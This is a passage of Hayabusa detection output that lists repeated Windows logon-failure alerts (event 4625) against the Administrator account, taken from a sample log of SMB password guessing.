NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.394 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bZSkhwZXc1SSknDT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.435 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 05AuqlN44x7oJGoi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.482 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RQ4A6ReTVTcFCFeN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.532 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: T7U6i4CMrL0bHouf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NaeA4uZ6o8BRbzwf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.626 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MEnlL5BHmlCrtk7p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.669 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KRNMpwAAaTsyzPfR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.709 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oBtHQkRWIoq5hfn7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5pkk9lgqMQ4wxQel | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yQVan7kRDOlnim50 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.857 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9282GqsC7UiUMbRl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.892 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3lj7GjYryW9wjGgS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.990 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MPy4iUy5WBSLUBdy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.041 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0kvD9DEuos8SRrLH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NH1EnMG6fTvcz4QR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.131 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cqHDXSQn8gkl2LJy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RWI9XDDHjs2xcNB7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.210 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zo53mEz6nal5Gxff | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jtOgC6wqMoNYVxId | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.297 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DdadoJYvD7DYjlSG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.341 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U1xjdqjT9h0KUqG2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.389 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QfkzZBvO4onYx6JZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JqY8CvyODDLQV9Ps | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.482 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nPMRIxRVuh13jmZD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.523 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jARkTWdKTfTIwlug | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.567 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zwhkc71Nfn7QDf7c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.612 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qsYad9PgEajlYqvo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.649 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v9YPw0DsspVbrOld | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wsHpLCOdAOPFM6nD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.732 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OcNytOhGOZKaREL9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lc5boBVigHE1ccGA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.819 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BQXg4ZHdBYHyiTTO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.853 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JebTJzyn91NrpvkD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8wCE5ypjEU5feEEv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OglsROoqX48xm0gJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5bNC9ES3l3KwXPxb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:45.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: byPavQuiscMm7CMW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:45.042 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UQESAC3XpxCJJfG5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:45.084 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5aYRnzirSj0PNXAE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:45.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8s9xJ659geFHOlY4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:45.154 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yBQdyO0diiFixwlx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:45.197 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vzULtccOFnLIRiVM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:45.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1pDEGzqTAyUab5P8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:45.274 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gomgb26W9qFacRr7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:45.318 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GXOcDu88S5c5VwwV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:45.363 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WHRnzgQkfAhsUguj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:45.401 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A0Q9ZIaRK43W9apv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:45.453 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2xvriGeIlDwtzS36 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:45.498 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pDYTFqeJC61Nneef | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:45.538 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0LNR7xCHW9x2q2qc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:45.578 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AE4EBj8X5IfXO8ZZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:45.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2BEOSGw6TjZf9GWS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:45.679 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UCxe24uL4A6R9kgZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:45.830 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F8v4DcIRkx43KCIs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:45.892 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CY2buVupQ5oR1Cp5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:45.950 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f6c3MlpMEzkCVud2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:45.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E2wV6op9AU4paDXp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:46.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BNn6aywSs67hVAO2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:46.109 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wUa03SIX69WCIYbp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:46.158 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zYi4TB42B2VQm5Tr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:46.204 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9mnUbGMnlrOR8Tv4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:46.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CJGMWqgmbXABdPvB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:46.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2W9BbDYgC6vhqU3o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:46.392 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q6DYsaih1Yhb2uOD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:46.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q4o93QpJL4pxx94q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:46.476 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lQf1OsHb4lpgMPbl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:46.525 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HcJUYelneVqBQjr9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:46.569 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I0d6daEeIadJRbBI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:46.612 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SQ1hvZeT9aulbu4g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:46.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 75RBCjr2eRDLhTqW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:46.700 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: maMlpuzhleuQHhIo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:46.737 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AkpNfbOHUr7cY52z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:46.789 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R7SUyYbLPfPAGUfw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:46.845 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7clwftf7R0uNbqJ9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:46.883 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IsIyPcMAPnlxJa12 | IP Addr: 192.168.198.149 | AuthPackage: 